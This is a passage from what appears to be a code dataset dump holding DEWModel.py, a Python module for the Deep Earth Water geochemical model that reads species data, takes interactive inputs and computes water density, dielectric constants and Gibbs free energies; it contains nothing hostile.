source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
DEWModel.py
|
#!/usr/bin/env python
# coding: utf-8
## Package Imports
# Equation imports
import numpy as np
from DEWPython import DEWEquations
# Pandas is used for the custom sheet reading
import pandas as pd
# sys, threading, subprocess, and os all correspond to uses within the supcrt functions
import sys
import threading
import subprocess
import os
# json is used to
import json
# plotting imports
import matplotlib.pyplot as plt
from mpl_toolkits import mplot3d
from matplotlib.lines import Line2D
get_ipython().run_line_magic('matplotlib', 'inline') # I don't think this is important, but is still ere
from collections import defaultdict
# path and pkg_resources are used to reference downloaded files in the package
import pkg_resources
import os.path as op
#### Defining a Global Variables (Location and Constants)
resource_package = 'DEWPython' # resource package definition (standard)
#defualt mineral dictionary
min_path = '/'.join(('resources', 'mineralDictionary.txt'))
mineralPath = pkg_resources.resource_filename(resource_package, min_path)
# extended mineral dictionary
min_path2 = '/'.join(('resources', 'extendMineralDictionary.txt'))
mineralPath2 = pkg_resources.resource_filename(resource_package, min_path2)
#path for the gasses used
gas_path = '/'.join(('resources', 'gasLst.txt'))
gasPath = pkg_resources.resource_filename(resource_package, gas_path)
#path for the aqueous species used
aq_path = '/'.join(('resources', 'aqueousLst.txt'))
aqPath = pkg_resources.resource_filename(resource_package, aq_path)
#paths for custom sheets
die_path = '/'.join(('resources', 'dielectric.csv'))
diePath = pkg_resources.resource_filename(resource_package, die_path)
inp_path ='/'.join(('resources', 'input.csv'))
inpPath = pkg_resources.resource_filename(resource_package, inp_path)
den_path ='/'.join(('resources', 'Wat_den.csv'))
denPath = pkg_resources.resource_filename(resource_package, den_path)
g_path = '/'.join(('resources', 'water_gibbs.csv'))
gPath = pkg_resources.resource_filename(resource_package, g_path)
# paths for supcrt
sup_path = '/'.join(('resources', 'supcrt96.exe'))
supPath = pkg_resources.resource_filename(resource_package, sup_path)
global Tr, bigQ, Chi, Pr, E_PrTr, bigR, Psi, Theta, Upsilon, Conversion, mineralDictionary
mineralDictionary = json.load(open(mineralPath))
try:
mineralDictionary2 = json.load(open(mineralPath2)) # the extended mineral dictionary is too large to be stored in github
'''A dictionary that stores all the minerals and allows them to be queried for use in the DEW model.'''
except:
print('Extended Mineral Dictionary not in use')
# Defining global constants analagous to DEW 2019
bigQ = 5.903E-07
'''Big Q is the 5.903E-07, and has units of bar^-1 '''
Chi = -3.090E-07
'''X is the constant -3.090E-07 and has units of K^-2'''
T_r = 298.15
'''The standard state temperature 298.15 with units K'''
Pr = 1
'''The standard state pressure of 1 bar'''
E_PrTr = 78.47
'''Epsilon_{P_rT_r} is a unitless constant with value of 78.47'''
bigR = 1.9858775
'''The gas constant with value 1.9858775 cal mol^-1 k^-1'''
Psy = 2600
'''The value of this constant is 2600 bar'''
Theta = 228
'''The value of this temperature is 228 Kelvin'''
Upsilon = -5.79865E-05
'''The value of this constant is -5.79865E-05 K^-1'''
Conversion = 41.8393
'''A conversion factor present in DEW publications'''
# ## Importing the Aqueous Species Table from the Sheet
[nameLst, symbolDict, delGf, delHf, entropy, volume, specHeat, a1x10,
a2x10_2, a3, a4x10_4, c1, c2x10_4, omegax10_5, Z, comments] = json.load(open(aqPath))
############ CODE SAMPLE FOR ADDING ADDITIONAL SPECIES (AQ) ##################################
# nameLst.append('ALANINE,AQ')
# symbolDict['ALANINE,AQ'] = 'C3H7NO2'
# delGf['ALANINE,AQ'] = -88810
# delHf['ALANINE,AQ'] = -132500
# entropy['ALANINE,AQ'] = 38.83
# volume['ALANINE,AQ'] = 60.4
# specHeat['ALANINE,AQ'] = 33.6
# a1x10['ALANINE,AQ'] = 14.9
# a2x10_2['ALANINE,AQ'] = 1.74
# a3['ALANINE,AQ'] = 7.16
#a4x10_4['ALANINE,AQ'] = -3.69
# c1['ALANINE,AQ'] = 49.5
# c2x10_4['ALANINE,AQ'] = -7
# omegax10_5['ALANINE,AQ'] = 0.18
# Z['ALANINE,AQ'] = 0
### CODE FOR REWRITING BASE FILES ###
# d =[nameLst, symbolDict, delGf, delHf, entropy, volume, specHeat, a1x10,
# a2x10_2, a3, a4x10_4, c1, c2x10_4, omegax10_5, Z, comments]
# json.dump(d, open("aqueousLst.txt",'w'))
####################### CODE SAMPLE FOR AUTOMATICALLY UPDATING SPECIES (GAS) #############################
# This can be easily adapted for aqueous species too
# with open('slopGasses.txt') as f:
# impor = f.read()
# import_data = impor.replace('\t', ' ')
# split = import_data.split('\n')
# newsplit = []
# for i in split:
# line = i.split(' ')
# newline = [j for j in line if j]
# newsplit.append(newline)
# for i in range(len(newsplit)):
# if ',g' in newsplit[i][0] :
# GasLst.append(newsplit[i][0])
# GasSymb[newsplit[i][0]] = newsplit[i][1]
# GasDelGf[newsplit[i][0]] =float(newsplit[i+3][0])
# GasDelHf[newsplit[i][0]] =float(newsplit[i+3][1])
# GasEntropy[newsplit[i][0]] =float(newsplit[i+3][2])
# GasCp[newsplit[i][0]] =float(newsplit[i+3][3])
# GasA[newsplit[i][0]] =float(newsplit[i+4][0])
# GasBx103[newsplit[i][0]] =float(newsplit[i+4][1])
# GasCx10_5[newsplit[i][0]] =float(newsplit[i+4][2])
# GasT[newsplit[i][0]] =float(newsplit[i+5][0])
# g =[GasLst,GasSymb,GasDelGf,GasDelHf,GasEntropy,GasCp,GasA,GasBx103,GasCx10_5, GasT]
# json.dump(g, open("gasLstNew.txt",'w'))
# ## Importing the Gas Table from the Sheet
[GasLst,GasSymb,GasDelGf,GasDelHf,GasEntropy,GasCp,GasA,GasBx103,GasCx10_5, GasT] = json.load(open(gasPath))
# Search function - can take any length of string
def search(string):
'''A function to searh for species within DEWython'''
for item in nameLst:
if str.lower(string) in str.lower(item):
print(item)
for item in GasLst:
if str.lower(string) in str.lower(item):
print(item)
for key in mineralDictionary:
if str.lower(string) in str.lower(key):
print(key)
# # An Object Class that Can Calculate and Return Parameters for Different Options of the Deep Earth Water Model
class DEW(object):
def __init__(self):
# User Option Parameters
self.ptInput = 'Psat'
'''The temperature and pressure input, options are Regular, Psat, or custom. Default is regular'''
self.RhoOfWater = 'Z&D 2005'
'''The density of water equation input, can be Zheng and Duan 2005, Zheng and Duan 2009, or custom. Default is Z&D 2005'''
self.forceCustom = False
'''The option to force custom Rho for P< 1 kb. Default is False'''
self.dielectricEq = 'Supcrt'
'''The dielectric equation input. The default is Sverjensky.'''
self.ForceSupcrt = True
'''The option to force supcrt for P < 5 kb. Default is set to true'''
self.WaterFreeEq = 'D&H 1978'
'''The option for the Water free energy equation. Options are D&H 1978, integral, and custom
Default is Delaney and Hegelson 1978.'''
self.DisplayVolOpt = True
'''The option to display volume, default set to true'''
self.PsatDisplayVol = True
'''The option to display volume under Psat conditions. Default is set to true.'''
self.DisplayVol = True
'''Another display volume option. Default to true.'''
self.equation = 1
'''A variable that stores the number of the density of water equation. Needs to be renamed'''
self.diaEq = 1
'''A variable that stores the number of dielectric constant equation.'''
self.psat = True
'''A variable that stores the Psat option defined by input'''
self.waterDensity = 1
'''A variable that stores the number of the density of water equation.'''
# Input Arrays
self.aqueousInputs = []
'''The array of aqueous inputs and multipliers defined by a user'''
self.mineralInputs = []
'''The array of mineral inputs and multipliers defined by a user'''
self.gasInputs = []
'''The array of gas inputs and multipliers defined by a user'''
self.waterInputs = []
'''An array that defines if water is used in the input and hOw mUcH wAtEr?'''
# Input Matrices
self.inGasMat = []
'''A matrix that stores in gasseous inputs with their properties from the dicitonary inputs'''
self.inAqMat = []
'''A matrix that stores in aqueous inputs with their properties from the dicitonary inputs'''
# Output Arrays
self.aqueousOutputs = []
'''The array of aqueous outputs and multipliers defined by a user'''
self.mineralOutputs = []
'''The array of mineral outputs and multipliers defined by a user'''
self.gasOutputs = []
'''The array of gas outputs and multipliers defined by a user'''
self.waterOutputs = []
'''An array that defines if water is used in the outputand hOw mUcH wAtEr?'''
# Output Matrices
self.outGasMat = []
'''A matrix that stores in gasseous outputs with their properties from the dicitonary inputs'''
self.outAqMat = []
'''A matrix that stores in aqueous outputs with their properties from the dicitonary inputs'''
# Arrays used for Calculations
self.tempUsed = []
'''An array set by the set_TPRho method that contains all the temperatures used for calculation in celsius'''
self.pressureUsed = []
'''An array set by the set_TPRho method that contains all the pressures used for calculation'''
self.tKelvin = []
'''An array set by the set_TPRho method that contains all the temperatures used for calculation in Kelvin'''
self.RhoWatArr = []
'''An array set by the set_TPRho method that contains calculated water densities at the temperatures and pressures used
'''
self.DiaArr = []
'''An array set by the set_TPRho method that contains calculated dielectric constants at temp/pressure used'''
self.QArr = []
'''An array set by the set_TPRho method that contains calculated Q constants at temp/pressure used'''
self.GibbsH2O = []
'''A collection of the gibbs of water values.'''
# Collections of Custom Values
self.dielectricCollection = []
'''If custom values are used for the dielectric constant this will store them to be queried by the custom function'''
self.gibbsCollection = []
'''If custom values are used for the gibbs of water this will store them to be queried by the custom function'''
self.densityCollection = []
'''If custom values are used for the density of water this will store them to be queried by the custom function'''
# Calculated Matrices
self.gasInpGibbs = []
'''Used for debugging, stores the free energy changes of gases'''
self.aqInpGibbs = []
'''Used for debugging, stores the free energy changes of aqueous inputs'''
self.gasInpV = []
'''Used for debugging, stores the volume changes of gasseous inputs'''
self.aqInpV = []
'''Used for debugging, stores the volume changes of aqueous inputs'''
self.gasOutGibbs = []
'''Used for debugging, stores the free energy changes of gasseous inputs'''
self.aqOutGibbs = []
'''Used for debugging, stores the free energy changes of aqueous outputs'''
self.gasOutV = []
'''Used for debugging, stores the volume changes of gasseous outputs'''
self.aqOutV = []
'''Used for debugging, stores the volume changes of aqueous outputs'''
#Mineral Matrices
self.mineralInpGibbs = []
'''Used for debugging, stores the free energy changes of mineral inputs'''
self.mineralOutGibbs = []
'''Used for debugging, stores the free energy changes of mineral outputs'''
self.mineralInpV = []
'''Used for debugging, stores the volume changes of mineral inputs'''
self.mineralOutV = []
'''Used for debugging, stores the volume changes of mineral outputs'''
#Water
self.waterInpGibbs = []
'''Used for debugging, stores the free energy changes of water outputs'''
self.waterInpV = []
'''Used for debugging, stores the volume changes of water inputs'''
self.waterOutGibbs = []
'''Used for debugging, stores the free energy changes of water outputs'''
self.waterOutV = []
'''Used for debugging, stores the volume changes of water outputs'''
# Finals Arrays
self.gibbsLst = []
'''A storage variable that lists the gibbs free energy changes. Not sure if necessary'''
self.logK = []
'''Stores the list of all logK values with temperatures and pressures'''
self.vLst = []
'''A storage variable that lists all the volume changes. Not sure if necessary '''
self.delG = []
'''Stores the list of all delG values with temperatures and pressures'''
self.delV = []
'''Stores the list of all delV values with temperatures and pressures'''
# Variables to Help with Plotting
self.pressRed = []
'''Reduced pressure list with no repeats'''
self.tempRed = []
'''Reduced temperature list with no repeats'''
self.pLogK = []
'''LogK split into arrays with respect to the number of isobars'''
self.pDelG = []
'''DelG split into arrays with respect to the number of isobars'''
self.pDelV = []
'''DelV split into arrays with respect to the number of isobars'''
self.tLogK = []
'''LogK split into arrays with respect to the number of isotherms'''
self.tDelG = []
'''DelG split into arrays with respect to the number of isotherms'''
self.tDelV = []
'''DelV split into arrays with respect to the number of isotherms'''
# Variables to run SUPCRTBL
self.proc = None
'''Needed to run supcrt'''
self.pout = None
'''Needed to run supcrt'''
self.pin = None
'''Needed to run supcrt'''
self.supcrtFile = None
'''Stores the most recently run SUPCRT file, or none if none have been run'''
self.supcrtOut = None
'''Stores the output from calculate_supcrt'''
def clear(self):
'''Clears variables'''
self.__init__()
return
def set_inputs(self):
'''Call this to set the input Arrays. This is not dependent on anything else being called first.'''
# A list of integers
intLst = ['1','2','3','4', '5', '6','7', '8', '9', '10', '11']
# Mineral Loop
mineralCount = 0
aqCount = 0
gasCount = 0
self.mineralInputs = []
self.aqueousInputs = []
self.gasInputs = []
self.waterInputs = []
while mineralCount < 15:
mineralCount += 1
validBool = False
while not validBool:
inp = input('Input Mineral Species')
# can insert mineral validation here if possible
if inp in mineralDictionary:
validBool = True
elif inp == "":
validBool = True
else:
print('Your Species is not in the list, please check your spelling')
continue
validBool2 = False
while not validBool2:
inp2 = input('Input Mineral Species Multiplier')
if inp2 in intLst:
validBool2 = True
elif inp == "":
validBool2 = True
else:
print('Your multiplier is invalid, please check to make sure this is an integer')
if inp == "":
break
self.mineralInputs.append([inp, inp2])
while aqCount <15:
aqCount += 1
validBool = False
while not validBool:
inp = input('Input Aqueous Species')
if inp in nameLst:
validBool = True
elif inp == "":
validBool = True
else:
print('Your Species is not in the list, please check your spelling')
continue
validBool2 = False
if validBool:
while not validBool2:
inp2 = input('Input Aqueous Species Multiplier')
if inp2 in intLst:
validBool2 = True
elif inp == "":
validBool2 = True
else:
print('Your multiplier is invalid, please check to make sure this is an integer')
if inp == "":
break
self.aqueousInputs.append([inp, inp2])
while gasCount < 15:
gasCount += 1
validBool = False
while not validBool:
inp = input('Input Gas Species')
if inp in GasLst:
validBool = True
elif inp == "":
validBool = True
else:
print('Your Species is not in the list, please check your spelling')
continue
if validBool:
validBool2 = False
while not validBool2:
inp2 = input('Input Gas Species Multiplier')
if inp2 in intLst:
validBool2 = True
elif inp == "":
validBool2 = True
else:
print('Your multiplier is invalid, please check to make sure this is an integer')
if inp == "":
break
self.gasInputs.append([inp, inp2])
# Water
validBool3 = False
while not validBool3:
inpWater = input('Would you like to use water? (yes/no)')
if inpWater in ['yes', 'no']:
validBool3 = True
else:
print('Please answer yes or no')
continue
if inpWater == 'yes':
validBool3 = False
while not validBool3:
m3 = input('Enter enter water Multiplier')
if m3 in intLst:
validBool3 = True
else:
print('Please enter a valid integer multiplier ')
else:
m3 = 0
self.waterInputs.append([inpWater, m3])
return
def set_outputs(self):
'''Call this to set the output Arrays. This is not dependent on anything else being called first.'''
# A list of integers
intLst = ['1','2','3','4', '5', '6','7', '8', '9', '10', '11']
# Mineral Loop
mineralCount = 0
aqCount = 0
gasCount = 0
self.mineralOutputs = []
self.aqueousOutputs = []
self.gasOutputs = []
self.waterOutputs = []
while mineralCount < 15:
mineralCount += 1
validBool = False
while not validBool:
inp = input('Output Mineral Species')
# can insert mineral validation here if possible
validBool = True
validBool2 = False
while not validBool2:
inp2 = input('Output Mineral Species Multiplier')
if inp2 in intLst:
validBool2 = True
elif inp == "":
validBool2 = True
else:
print('Your multiplier is invalid, please check to make sure this is an integer')
if inp == "":
break
self.mineralOutputs.append([inp, inp2])
while aqCount <15:
aqCount += 1
validBool = False
while not validBool:
inp = input('Output Aqueous Species')
if inp in nameLst:
validBool = True
elif inp == "":
validBool = True
else:
print('Your Species is not in the list, please check your spelling')
continue
validBool2 = False
if validBool:
while not validBool2:
inp2 = input('Output Aqueous Species Multiplier')
if inp2 in intLst:
validBool2 = True
elif inp == "":
validBool2 = True
else:
print('Your multiplier is invalid, please check to make sure this is an integer')
if inp == "":
break
self.aqueousOutputs.append([inp, inp2])
while gasCount < 15:
gasCount += 1
validBool = False
while not validBool:
inp = input('Input Gas Species')
if inp in GasLst:
validBool = True
elif inp == "":
validBool = True
else:
print('Your Species is not in the list, please check your spelling')
continue
validBool2 = False
if validBool:
while not validBool2:
inp2 = input('Input Gas Species Multiplier')
if inp2 in intLst:
validBool2 = True
elif inp == "":
validBool2 = True
else:
print('Your multiplier is invalid, please check to make sure fthis is an integer')
if inp == "":
break
self.gasOutputs.append([inp, inp2])
# Water
validBool3 = False
while not validBool3:
outWater = input('Would you like to use water in the output? (yes/no)')
if outWater in ['yes', 'no']:
validBool3 = True
else:
print('Please answer yes or no')
if outWater == 'yes':
validBool3 = False
while not validBool3:
m3 = input('Enter enter water Multiplier')
if m3 in intLst:
validBool3 = True
else:
print('Please enter a valid integer multiplier ')
else:
m3 = 0
self.waterOutputs.append([outWater, m3])
return
def set_preferences(self):
'''A function that prompts for user inputs. This is not dependent on anything else being called first. Defaults
are set to be identical to the example calculation on the Deep Earth Water Model Excel Sheet.'''
validBool = False
while not validBool:
ptInp = input('Which P-T input would you like to use? "Custom", "Regular", or "Psat"')
if ptInp in ['Custom', 'Regular', 'Psat']:
validBool = True
self.ptInput = ptInp
else:
print('Please enter one of the provided options')
validBool = False
while not validBool:
RhoOfwater = input('Which density of water would you like to use? "Z&D 2005", "Z&D 2009", or "Custom"')
if RhoOfwater in ['Z&D 2005', 'Z&D 2009', 'Custom']:
validBool = True
self.RhoOfWater = RhoOfwater
else:
print('Please enter one of the provided options')
validBool = False
while not validBool:
force = input('Force Custom? (yes/no)')
if force == 'yes':
validBool = True
elif force == 'no':
validBool = True
self.forceCustom = False
else:
print('Please enter one of the provided options')
validBool = False
while not validBool:
dia = input('Dielectric Constant Equation Option: "Supcrt", "Franck", "Fernandez", "Sverjensky", or "Custom"')
if dia in ['Supcrt', 'Franck', 'Fernandez', 'Sverjensky','Custom']:
validBool = True
self.dielectricEq = dia
else:
print('Please enter one of the provided options')
validBool = False
while not validBool:
forceS = input('Force Supcrt? (yes/no)')
if forceS == 'yes':
validBool = True
elif forceS == 'no':
validBool = True
self.ForceSupcrt = False
else:
print('Please enter one of the provided options')
validBool = False
while not validBool:
freeE = input('Water Free Energy Equation Option: "D&H 1978", "Integral", "Custom"')
if freeE in ['D&H 1978', 'Integral', 'Custom']:
validBool = True
self.WaterFreeEq = freeE
validBool = False
while not validBool:
dispO = input('Display Volume Option? (yes/no)')
if dispO == 'yes':
validBool = True
elif dispO == 'no':
validBool = True
self.DisplayVolOpt = False
else:
print('Please enter one of the provided options')
validBool = False
while not validBool:
PsatdispO = input('Psat Display Volume Option? (yes/no)')
if PsatdispO == 'yes':
validBool = True
elif PsatdispO == 'no':
validBool = True
self.PsatDisplayVol = False
else:
print('Please enter one of the provided options')
validBool = False
while not validBool:
dispV = input('Display Volume? (yes/no)')
if dispV == 'yes':
validBool = True
elif dispV == 'no':
validBool = True
self.DisplayVol = False
else:
print('Please enter one of the provided options')
if self.WaterFreeEq == "Custom" or self.dielectricEq == "Custom" or self.RhoOfWater == "Custom":
self.dielectricCollection, self.densityCollection, self.gibbsCollection = self.import_custom_sheets()
return
def import_custom_sheets(self):
'''A helper function to import custom data from the Deep Earth Water Model.
This only currently works for an unmodified Deep Earth Water Model Sheet format (6_23_20).
This is not dependent on anything else being called first.'''
diaL = pd.read_csv(diePath, header = None)
dia = diaL.to_numpy()
dia = dia[4:, 1:]
diaTrim = dia[1:, 1:]
diaCollection = []
for row in range(len(diaTrim)):
for pressure in range(len(diaTrim[0])):
# in form pressure, temperature, value
diaCollection.append([dia[0][pressure + 1], dia[row + 1][0], diaTrim[row][pressure]])
watDen = pd.read_csv(denPath, header = None)
w = watDen.to_numpy()
w = w[4:, 1:]
wTrim = w[1:,1:]
watDenCollection = []
for row in range(len(wTrim)):
for pressure in range(len(wTrim[0])):
# in form pressure, temperature, value
watDenCollection.append([w[0][pressure + 1], w[row + 1][0], wTrim[row][pressure]])
gibbsOfWater = pd.read_csv(gPath, header = None)
gibbs = gibbsOfWater.to_numpy()
gibbs = gibbs[3:,:]
gibbsTrim = gibbs[1:, 1:]
gibbsCollection = []
for row in range(len(gibbsTrim)):
for pressure in range(len(gibbsTrim[0])):
# in form pressure, temperature, value
gibbsCollection.append([gibbs[0][pressure + 1], gibbs[row + 1][0], gibbsTrim[row][pressure]])
return diaCollection, watDenCollection, gibbsCollection
def set_TPRho(self):
'''Sets arrays of temperature, pressure, water density, and Q to be used in the model based on user input.
Requires that the input and output arrays have been set up otherwise it will return a divide by 0 error in the
calculations.'''
pressArr = []
tempArr = []
self.RhoWatArr = []
self.DiaArr = []
self.QArr =[]
self.gibbsLst = []
self.logK = []
self.vLst = []
self.delG = []
self.delV = []
if self.ptInput == "Custom":
ptSheet = pd.read_csv(inpPath,encoding= 'unicode_escape', header = None)
ptFinder = ptSheet.to_numpy()
tempArr = [float(i[1]) for i in ptFinder[4:]]
pressArr = [float(i[0]) for i in ptFinder[4:]]
elif self.ptInput == "Regular":
validBool = False
while not validBool:
try:
templow = int(input('Input the minimum temperature'))
temphigh = int(input('Input the maximum temperature'))
tempstep = int(input('Input the temperature step'))
pmin = float(input('Input the minimum pressure (Kb)'))
pmax = float(input('Input the maximum pressure (Kb)'))
pstep = float(input('Input the pressure step (Kb)'))
validBool = True
except ValueError:
print('You have entered a non-integer value, please start again')
tempArr = np.arange(start= templow, stop = temphigh + .00001, step = tempstep)
parrHelp = np.arange(start= pmin, stop = pmax + .00001, step = pstep)
for i in range(len(parrHelp)):
pressArr.append([parrHelp[i]]* len(tempArr))
pressArr = np.multiply(pressArr, 1000)
tempArr = [tempArr] * len(parrHelp)
elif self.ptInput == "Psat":
validBool = False
while not validBool:
try:
templow = int(input('Input the minimum temperature'))
temphigh = int(input('Input the mamximum temperature'))
tempstep = int(input('Input the temperature step'))
validBool = True
except ValueError:
print('You have entered a non-integer value, please start again')
tempArr = np.arange(start= templow, stop = temphigh + 1, step = tempstep)
for i in range(len(tempArr)):
if tempArr[i] < 100:
pressArr.append(1)
else:
pressArr.append(2.1650906415E-11*np.double(tempArr[i])**5 + 0.0008467019353*np.double(tempArr[i])**2 - 0.17973651666*tempArr[i] + 10.7768850763807)
else:
# If I've done the checking correctly above it should never reach this
raise ValueError("You have not set your options yet, please set them before continuing")
self.tempUsed = np.ndarray.flatten(np.asarray(tempArr))
self.pressureUsed = np.ndarray.flatten(np.asarray(pressArr))
self.tKelvin = np.add(self.tempUsed, 273.15)
# code to set options in a way the equations can understand
if self.ptInput == "Psat":
self.psat = True
else:
self.psat = False
if self.RhoOfWater =='Z&D 2005':
self.equation = 1
elif self.RhoOfWater == 'Z&D 2009':
self.equation = 2
else:
self.equation = 3
if self.dielectricEq == "Supcrt":
self.diaEq = 1
elif self.dielectricEq == "Franck":
self.diaEq = 2
elif self.dielectricEq == "Fernandez":
self.diaEq = 3
elif self.dielectricEq == "Sverjensky":
self.diaEq = 4
else:
self.diaEq = 5
# write code to take in custom Rho, G, and Water Values here
self.densityCollection = np.asarray(self.densityCollection).astype(float)
self.dielectricCollection = np.asarray(self.dielectricCollection).astype(float)
self.gibbsCollection = np.asarray(self.gibbsCollection).astype(float)
# Sets the water density array
for i in range(len(self.pressureUsed)):
# For the custom array
if self.RhoOfWater =="Custom" or (self.forceCustom == True and self.pressureUsed[i] < 1000):
idx = np.intersect1d(np.where(np.asarray(self.densityCollection) == self.pressureUsed[i]/1000), np.where(np.asarray(self.densityCollection) == self.tempUsed[i]))[0]
if not np.isnan(self.densityCollection[idx][2]):
self.RhoWatArr.append(self.densityCollection[idx][2])
else:
self.RhoWatArr.append(0)
else:
self.RhoWatArr.append(DEWEquations.DEWEquations.calculateDensity(self.pressureUsed[i], self.tempUsed[i], self.equation, 0.01, self.psat))
# Sets the dielectric constant array
for i in range(len(self.pressureUsed)):
# for the custom array
if self.dielectricEq == "Custom":
idx = np.intersect1d(np.where(np.asarray(self.dielectricCollection) == self.pressureUsed[i]/1000), np.where(np.asarray(self.dielectricCollection) == self.tempUsed[i]))[0]
if not np.isnan(self.dielectricCollection[idx][2]):
self.DiaArr.append(self.dielectricCollection[idx][2])
else:
self.DiaArr.append(0)
else:
if self.ForceSupcrt == True and self.pressureUsed[i] < 5000 and self.psat == False:
self.DiaArr.append(DEWEquations.DEWEquations.calculateEpsilon(self.RhoWatArr[i], self.tempUsed[i], 1, self.psat))
else:
self.DiaArr.append(DEWEquations.DEWEquations.calculateEpsilon(self.RhoWatArr[i], self.tempUsed[i], self.diaEq, self.psat))
### The function works up until this point, I haven't debugged further yet (6_29_20) ###
# Sets up the Q array
for i in range(len(self.pressureUsed)):
if self.DisplayVol == True:
try:
# Has issues with some Q, not sure if problematic
self.QArr.append(float(DEWEquations.DEWEquations.calculateQ(self.pressureUsed[i], self.tempUsed[i], self.RhoWatArr[i], self.equation, self.diaEq, self.psat))*np.double(10)**6)
except:
self.QArr.append(0)
else:
self.QArr.append(0)
# Sets up custom Gibbs of Water Array:
if self.WaterFreeEq == "Custom":
for i in range(len(self.pressureUsed)):
idx = np.intersect1d(np.where(np.asarray(self.gibbsCollection) == self.pressureUsed[i]/1000), np.where(np.asarray(self.gibbsCollection) == self.tempUsed[i]))[0]
if not np.isnan(self.gibbsCollection[idx][2]):
self.GibbsH2O.append(self.gibbsCollection[idx][2])
else:
self.GibbsH2O.append(0)
return
def calculate_matrices(self):
'''A helper function to aggregate the values to the input and output matrices.
It requires both the input and output arrays to be set up to function. It is called within "calculate"'''
self.inAqMat = []
self.inGasMat = []
self.outAqMat = []
self.outGasMat = []
for i in self.aqueousInputs:
self.inAqMat.append([i[0],symbolDict[i[0]], delGf[i[0]], delHf[i[0]], entropy[i[0]],volume[i[0]],specHeat[i[0]],
a1x10[i[0]], a2x10_2[i[0]], a3[i[0]],a4x10_4[i[0]],c1[i[0]],c2x10_4[i[0]],omegax10_5[i[0]],Z[i[0]], i[1]])
for i in self.gasInputs:
self.inGasMat.append([i[0],GasSymb[i[0]],GasDelGf[i[0]],GasDelHf[i[0]],GasEntropy[i[0]],GasCp[i[0]], GasA[i[0]],
GasBx103[i[0]],GasCx10_5[i[0]],GasT[i[0]], i[1]])
for i in self.aqueousOutputs:
self.outAqMat.append([i[0],symbolDict[i[0]], delGf[i[0]], delHf[i[0]], entropy[i[0]],volume[i[0]],specHeat[i[0]],
a1x10[i[0]], a2x10_2[i[0]], a3[i[0]],a4x10_4[i[0]],c1[i[0]],c2x10_4[i[0]],omegax10_5[i[0]],Z[i[0]], i[1]])
for i in self.gasOutputs:
self.outGasMat.append([i[0],GasSymb[i[0]],GasDelGf[i[0]],GasDelHf[i[0]],GasEntropy[i[0]],GasCp[i[0]], GasA[i[0]],
GasBx103[i[0]],GasCx10_5[i[0]],GasT[i[0]],i[1]])
return
def calculate_gas(self):
'''A helper function to calculate the gasseous columns and output them as a matrix. Specifically returns the arrays
gasInGibbs, gasOutGibbs, gasInV, gasOuV. Needs self.tempUsed and self.tKelvin to be set, as well as the input gas matrix.
It is called within the calculate function.'''
gasInGibbs = []
gasOuGibbs = []
gasInV = []
gasOuV = []
for gas in self.inGasMat:
storelst = []
storelst2 =[]
storelst.append(gas[0])
storelst.append(gas[10])
storelst2.append(gas[0])
storelst2.append(gas[10])
for i in range(len(self.tempUsed)):
if self.DisplayVol == False or self.tempUsed[i] == 0:
storelst2.append(0)
else:
storelst2.append(24.465)
for i in range(len(self.tKelvin)):
storelst.append(gas[2] - gas[4]*(self.tKelvin[i]-T_r) + gas[6]*(self.tKelvin[i]-T_r - self.tKelvin[i]*np.log(self.tKelvin[i]/T_r)) + gas[7]*(0.001)/2*(2*self.tKelvin[i]*T_r -np.double(self.tKelvin[i])**2 - np.double(T_r) **2) + gas[8]*100000*(np.double(self.tKelvin[i])**2 + np.double(T_r)**2 -2*self.tKelvin[i]*T_r)/(2*self.tKelvin[i]*np.double(T_r)**2))
gasInGibbs.append(storelst)
gasInV.append(storelst2)
for gas in self.outGasMat:
storelst = []
storelst2 = []
storelst.append(gas[0])
storelst.append(gas[10])
storelst2.append(gas[0])
storelst2.append(gas[10])
for i in range(len(self.tempUsed)):
if self.DisplayVol == False or self.tempUsed[i] == 0:
storelst2.append(0)
else:
storelst2.append(24.465)
for i in range(len(self.tKelvin)):
storelst.append(gas[2] - gas[4]*(self.tKelvin[i]-T_r) + gas[6]*(self.tKelvin[i]-T_r - self.tKelvin[i]*np.log(self.tKelvin[i]/T_r)) + gas[7]*(0.001)/2*(2*self.tKelvin[i]*T_r -np.double(self.tKelvin[i])**2 - np.double(T_r) **2) + gas[8]*100000*(np.double(self.tKelvin[i])**2 + np.double(T_r)**2 -2*self.tKelvin[i]*T_r)/(2*self.tKelvin[i]*np.double(T_r)**2))
gasOuGibbs.append(storelst)
gasOuV.append(storelst2)
if len(gasInGibbs) == 0:
gasInGibbs = [np.zeros(len(self.tKelvin) + 2)]
if len(gasOuGibbs) == 0:
gasOuGibbs = [np.zeros(len(self.tKelvin) + 2)]
if len(gasInV) == 0:
gasInV = [np.zeros(len(self.tKelvin) + 2)]
if len(gasOuV) == 0:
gasOuV = [np.zeros(len(self.tKelvin) + 2)]
return gasInGibbs, gasOuGibbs, gasInV, gasOuV
def calculate_H2O(self):
'''This function requires input and output matrices to be set. This is called within the calculate function.'''
waterMatInGibbs = []
waterMatOutGibbs = []
waterMatInV = []
waterMatOutV = []
if self.WaterFreeEq == 'D&H 1978':
self.waterDensity = 1
elif self.WaterFreeEq == 'Integral':
self.waterDensity = 2
else:
self.waterDensity = 3
if self.waterInputs[0][0] == 'yes':
waterLst = []
waterLst2 = []
waterLst.append('H2O')
waterLst.append(self.waterInputs[0][1])
waterLst2.append('H2O')
waterLst2.append(self.waterInputs[0][1])
for i in range(len(self.pressureUsed)):
#for i in range(len(self.pressureUsed)):
if self.WaterFreeEq == 'Custom':
try:
if self.GibbsH2O[i] == 0:
waterLst.append(0)
else:
waterLst.append(GibbsH2O[i])
except:
waterLst.append(GibbsH2O[i])
else:
store = DEWEquations.DEWEquations.calculateGibbsOfWater(self.pressureUsed[i], self.tempUsed[i], self.waterDensity, self.equation, self.psat)
waterLst.append(store)
if self.DisplayVol == True:
try:
waterLst2.append(18.01528/self.RhoWatArr[i])
except:
waterLst2.append(0)
continue
else:
waterLst2.append(0)
waterMatInGibbs.append(waterLst)
waterMatInV.append(waterLst2)
if self.waterOutputs[0][0] =='yes':
waterLst = []
waterLst2 = []
waterLst.append('H2O')
waterLst.append(self.waterOutputs[0][1])
waterLst2.append('H2O')
waterLst2.append(self.waterOutputs[0][1])
for i in range(len(self.pressureUsed)):
if self.WaterFreeEq == 'Custom':
try:
if GibbsH2O[i] == 0:
waterLst.append(0)
else:
waterLst.append(GibbsH2O[i])
except:
waterLst.append(GibbsH2O[i])
else:
waterLst.append(DEWEquations.DEWEquations.calculateGibbsOfWater(self.pressureUsed[i], self.tempUsed[i], self.waterDensity, self.equation, self.psat))
if self.DisplayVol == True:
try:
